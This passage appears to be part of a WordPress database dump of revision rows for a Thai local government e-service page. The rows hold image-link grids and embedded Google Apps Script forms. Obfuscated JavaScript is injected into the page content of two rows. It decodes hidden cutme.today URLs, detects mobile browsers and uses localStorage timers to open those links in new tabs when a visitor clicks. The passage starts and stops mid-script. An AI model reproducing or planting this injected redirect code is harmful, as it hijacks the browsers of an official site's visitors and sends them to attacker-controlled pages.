setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 14:39:14','2025-07-03 07:39:14','',14,'http://pakhaeng.ssk.in.th/?p=1664',0,'revision','',0),
(1665,1,'2025-07-03 14:39:44','2025-07-03 07:39:44','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 14:39:44','2025-07-03 07:39:44','',459,'http://pakhaeng.ssk.in.th/?p=1665',0,'revision','',0),
(1667,1,'2025-07-03 14:52:58','2025-07-03 07:52:58','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 14:52:58','2025-07-03 07:52:58','',459,'http://pakhaeng.ssk.in.th/?p=1667',0,'revision','',0),
(1668,1,'2025-07-03 14:54:02','2025-07-03 07:54:02','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 14:54:02','2025-07-03 07:54:02','',459,'http://pakhaeng.ssk.in.th/?p=1668',0,'revision','',0),
(1671,1,'2025-07-03 14:57:12','2025-07-03 07:57:12','<!-- wp:image {\"id\":1509,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\" alt=\"\" class=\"wp-image-1509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const 